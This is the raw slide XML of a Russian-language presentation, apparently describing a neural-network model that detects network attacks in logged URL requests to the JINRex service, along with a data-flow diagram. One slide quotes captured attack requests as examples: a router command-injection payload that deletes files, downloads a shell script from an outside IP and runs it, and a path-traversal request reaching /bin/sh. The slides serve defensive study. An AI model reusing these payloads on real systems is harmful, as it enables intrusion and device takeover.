              <a:ext cx="45360" cy="4536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69" name="Блок-схема: узел 443"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8871840" y="523332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70" name="Блок-схема: узел 444"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8966880" y="5258160"/>
              <a:ext cx="45360" cy="453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71" name="Блок-схема: узел 445"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9016920" y="5180400"/>
              <a:ext cx="45360" cy="4536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72" name="Блок-схема: узел 446"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9039600" y="5265720"/>
              <a:ext cx="45360" cy="4536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12600" rIns="90000" bIns="-126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73" name="Подзаголовок 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7181640" y="4029120"/>
              <a:ext cx="972000" cy="34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rm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601"/>
                </a:spcBef>
                <a:tabLst>
                  <a:tab pos="0" algn="l"/>
                </a:tabLst>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="0" u="none" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="0055A0"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI"/>
                  <a:ea typeface="Roboto Slab"/>
                </a:rPr>
                <a:t>Walltime</a:t>
              </a:r>
              <a:endPara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8A8A81-013B-470B-B811-A104E3AE7135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="49"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BAA37919-6940-46F7-95F6-A234C15D2017}" type="slidenum">
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>51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PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="118800" y="272160"/>
            <a:ext cx="11953800" cy="490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b="1" u="none" strike="noStrik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Arial"/>
              </a:rPr>
              <a:t>Dataflow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5" name="Прямоугольник: загнутый угол 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="930240" y="1474560"/>
            <a:ext cx="839520" cy="716760"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner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CSV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6" name="Цилиндр 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="896400" y="2681640"/>
            <a:ext cx="917640" cy="1032120"/>
          </a:xfrm>
          <a:prstGeom prst="can">
            <a:avLst>
              <a:gd name="adj" fmla="val 25000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="0F6FC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pic>
        <p:nvPicPr>
          <p:cNvPr id="887" name="Google Shape;1347;p 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="891000" y="3355200"/>
            <a:ext cx="917640" cy="28152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888" name="Google Shape;1348;p 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1006200" y="2940840"/>
            <a:ext cx="630360" cy="436680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="889" name="Прямая со стрелкой 11"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="886" idx="1"/>
            <a:endCxn id="885" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1350000" y="2191320"/>
            <a:ext cx="5760" cy="49068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type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="890" name="Группа 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1770120" y="1038600"/>
            <a:ext cx="2226960" cy="1193040"/>
            <a:chOff x="1770120" y="1038600"/>
            <a:chExt cx="2226960" cy="1193040"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="891" name="Группа 24"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1770120" y="1434600"/>
              <a:ext cx="1779840" cy="797040"/>
              <a:chOff x="1770120" y="1434600"/>
              <a:chExt cx="1779840" cy="797040"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="892" name="Прямоугольник 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2295720" y="1434600"/>
                <a:ext cx="1254240" cy="797040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n-US" sz="1800" b="0" u="none" strike="noStrik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Data I</a:t>
                </a:r>
                <a:endParaRPr lang="ru-RU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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="893" name="Прямая со стрелкой 12"/>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1770120" y="1833120"/>
                <a:ext cx="525960" cy="36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round/>
                <a:tailEnd type="triangle" w="lg" len="lg"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="894" name="TextBox 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1847880" y="1038600"/>
              <a:ext cx="214884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1. Initial data load</a:t>
              </a:r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895" name="Группа 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3549960" y="1470960"/>
            <a:ext cx="2733840" cy="1151280"/>
            <a:chOff x="3549960" y="1470960"/>
            <a:chExt cx="2733840" cy="1151280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="896" name="Прямоугольник 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4618080" y="1825200"/>
              <a:ext cx="1254240" cy="79704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Data II</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="897" name="Прямая со стрелкой 13"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="892" idx="3"/>
              <a:endCxn id="896" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3549960" y="1833120"/>
              <a:ext cx="1068480" cy="390960"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50016"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="898" name="TextBox 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4086360" y="1470960"/>
              <a:ext cx="219744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2. </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1800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Filters</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US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 on client</a:t>
              </a:r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899" name="Группа 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5872320" y="1956600"/>
            <a:ext cx="2069280" cy="1195920"/>
            <a:chOff x="5872320" y="1956600"/>
            <a:chExt cx="2069280" cy="1195920"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="900" name="Прямоугольник 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6438960" y="2355480"/>
              <a:ext cx="1254240" cy="79704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Data III</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="901" name="Прямая со стрелкой 14"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="896" idx="3"/>
              <a:endCxn id="900" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5872320" y="2223720"/>
              <a:ext cx="567000" cy="530640"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50127"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="902" name="TextBox 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6190560" y="1956600"/>
              <a:ext cx="175068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3. Zoom filters</a:t>
              </a:r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903" name="Группа 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8076600" y="878400"/>
            <a:ext cx="4026600" cy="4001400"/>
            <a:chOff x="8076600" y="878400"/>
            <a:chExt cx="4026600" cy="4001400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="904" name="Блок-схема: узел 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8076600" y="878400"/>
              <a:ext cx="4026600" cy="4001400"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha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05" name="TextBox 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8668440" y="1418760"/>
              <a:ext cx="142092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Data I</a:t>
              </a:r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906" name="Группа 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8953560" y="1603440"/>
            <a:ext cx="2972880" cy="3075840"/>
            <a:chOff x="8953560" y="1603440"/>
            <a:chExt cx="2972880" cy="3075840"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="907" name="Блок-схема: узел 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8953560" y="1603440"/>
              <a:ext cx="2972880" cy="3075840"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha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08" name="TextBox 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9452880" y="2141640"/>
              <a:ext cx="142092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Data II</a:t>
              </a:r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909" name="Группа 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9660960" y="2539800"/>
            <a:ext cx="1955520" cy="1959480"/>
            <a:chOff x="9660960" y="2539800"/>
            <a:chExt cx="1955520" cy="1959480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="910" name="Блок-схема: узел 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9660960" y="2539800"/>
              <a:ext cx="1955520" cy="1959480"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartConnector">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha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ru-RU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11" name="TextBox 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10090080" y="3197520"/>
              <a:ext cx="142092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Data III</a:t>
              </a:r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912" name="Группа 30"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2900160" y="3818520"/>
            <a:ext cx="3481560" cy="804960"/>
            <a:chOff x="2900160" y="3818520"/>
            <a:chExt cx="3481560" cy="804960"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="913" name="Прямоугольник 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2900160" y="3818520"/>
              <a:ext cx="1254240" cy="797040"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F6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Scatter plot</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU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14" name="Прямоугольник 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5127480" y="3826440"/>
              <a:ext cx="1254240" cy="797040"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="0F6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Timeline chart</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="915" name="Прямая со стрелкой 27"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="913" idx="3"/>
              <a:endCxn id="914" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4154400" y="4217040"/>
              <a:ext cx="973440" cy="8280"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd type="triangle" w="lg" len="lg"/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="916" name="Группа 31"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2893680" y="4615560"/>
            <a:ext cx="2860920" cy="1301040"/>
            <a:chOff x="2893680" y="4615560"/>
            <a:chExt cx="2860920" cy="1301040"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="917" name="Прямоугольник 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2893680" y="5119560"/>
              <a:ext cx="1254240" cy="79704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Duration chart</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="918" name="Прямая со стрелкой 28"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="913" idx="2"/>
              <a:endCxn id="917" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3520800" y="4615560"/>
              <a:ext cx="6840" cy="504360"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="919" name="Прямая со стрелкой 29"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="914" idx="2"/>
              <a:endCxn id="917" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3520800" y="4623480"/>
              <a:ext cx="2234160" cy="496440"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="920" name="Группа 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3527280" y="4615560"/>
            <a:ext cx="2854440" cy="1285560"/>
            <a:chOff x="3527280" y="4615560"/>
            <a:chExt cx="2854440" cy="1285560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="921" name="Прямоугольник 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5127480" y="5104080"/>
              <a:ext cx="1254240" cy="79704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Data table</a:t>
              </a:r>
              <a:endParaRPr lang="ru-RU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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="922" name="Прямая со стрелкой 30"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="913" idx="2"/>
              <a:endCxn id="921" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3527280" y="4615560"/>
              <a:ext cx="2227680" cy="488880"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="923" name="Прямая со стрелкой 31"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="914" idx="2"/>
              <a:endCxn id="921" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5754600" y="4623480"/>
              <a:ext cx="360" cy="480960"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:round/>
              <a:tailEnd type="triangle" w="lg" len="lg"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Дата 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E2F8A80-1BEF-472A-83FC-FA351B62CD2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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E5CD91-7B7D-4B98-AB94-B2FAB919C612}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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671B07-6086-4F88-B16B-F19E4A5EB827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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350C8F-A2C1-42B3-A53C-4E45246C95A5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52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0" y="88845"/>
            <a:ext cx="12189960" cy="4001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6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Выполненные работы за 2025 год.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2600" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="81D41A"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2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Модель обнаружения сетевых атак</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2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sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="PlaceHolder 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="290880" y="779400"/>
            <a:ext cx="11608920" cy="529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</a:pP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В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рамках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развития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методов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сетевого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анализа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разработана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нейронная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сеть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,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использующая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архитектуру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1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Seq2Seq-autoencoder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,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которая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обеспечивает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реконструкцию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нормальных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паттернов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URL-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структур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,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где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значительное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отклонение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между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исходным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и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реконструированным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запросом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служит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индикатором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потенциальной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угрозы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.</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="2800" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr sz="2800" dirty="0"/>
            </a:b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Данный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подход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особенно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актуален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в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условиях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,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когда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примеры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аномалий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редки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или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недоступны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на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этапе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r>
              <a:rPr lang="en-US" sz="2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</a:rPr>
              <a:t>обучения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.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39750970-DA69-43CF-9F9E-790E83B3C1C9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831F75B-0EC7-4707-9FE9-1951DF3E6C80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BF0E220-4D15-4166-88E9-786B8783C128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6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Прямоугольник 273"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="99720" y="684000"/>
            <a:ext cx="12054960" cy="2203560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6480">
            <a:solidFill>
              <a:srgbClr val="00002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240" tIns="30240" rIns="75240" bIns="302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Данные URL-запросов к сервису </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="18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JINRex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5" name="Прямоугольник 274"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9455760" y="2943000"/>
            <a:ext cx="2734920" cy="3204000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6480">
            <a:solidFill>
              <a:srgbClr val="00002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240" tIns="30240" rIns="75240" bIns="302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3. Кластеризация</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Прямоугольник 275"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5086080" y="2943000"/>
            <a:ext cx="4282200" cy="3204000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6480">
            <a:solidFill>
              <a:srgbClr val="00002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240" tIns="30240" rIns="75240" bIns="302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2. Векторизация на основе TF-IDF-весов</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Прямоугольник 277"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="90360" y="1030320"/>
            <a:ext cx="12100320" cy="1937538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</a:rPr>
              <a:t>GET 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</a:rPr>
              <a:t>jinrex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</a:rPr>
              <a:t>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</a:rPr>
              <a:t>login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</a:rPr>
              <a:t>/0/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</a:rPr>
              <a:t>en?next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</a:rPr>
              <a:t>=/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</a:rPr>
              <a:t>jinrex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</a:rPr>
              <a:t>/ HTTP/1.1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</a:rPr>
              <a:t>GET /+CSCOE+/logon.html HTTP/1.1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</a:rPr>
              <a:t>GET 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</a:rPr>
              <a:t>static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</a:rPr>
              <a:t>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</a:rPr>
              <a:t>css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</a:rPr>
              <a:t>/toastr.min.css HTTP/1.1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</a:rPr>
              <a:t>POST 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</a:rPr>
              <a:t>jinrex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</a:rPr>
              <a:t>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</a:rPr>
              <a:t>rest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</a:rPr>
              <a:t>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</a:rPr>
              <a:t>change_excursion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</a:rPr>
              <a:t>/ HTTP/1.1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GET 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cgi-bin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luci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/;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stok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=/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locale?form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=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country&amp;operation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=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write&amp;country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=$(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rm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 -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rf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 *;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cd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 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tmp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;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wget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 http://94.156.8.244/tenda.sh;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chmod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 777 tenda.sh; ./tenda.sh) HTTP/1.1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POST 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cgi-bin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/../../../../../../../../../../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bin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sh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Noto Sans CJK SC"/>
              </a:rPr>
              <a:t> HTTP/1.1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…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u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Noto Sans CJK SC"/>
              </a:rPr>
              <a:t>(837787 запросов к </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" b="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Noto Sans CJK SC"/>
              </a:rPr>
              <a:t>JINRex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1200" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Noto Sans CJK SC"/>
              </a:rPr>
              <a:t>, накопленных за период с марта 2024 г.)</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="12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279" name="Прямоугольник 278"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78480" y="2951640"/>
            <a:ext cx="4899240" cy="3204000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="6480">
            <a:solidFill>
              <a:srgbClr val="00002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240" tIns="30240" rIns="75240" bIns="302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1. Предварительная обработка</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="280" name="Рисунок 279"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="153720" y="3491640"/>
            <a:ext cx="4824000" cy="2470680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="36000">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="281" name="Рисунок 280"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5182200" y="3276000"/>
            <a:ext cx="3992760" cy="2842560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="36000">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="282" name="Рисунок 281"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9502200" y="3341160"/>
            <a:ext cx="2606040" cy="1110600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
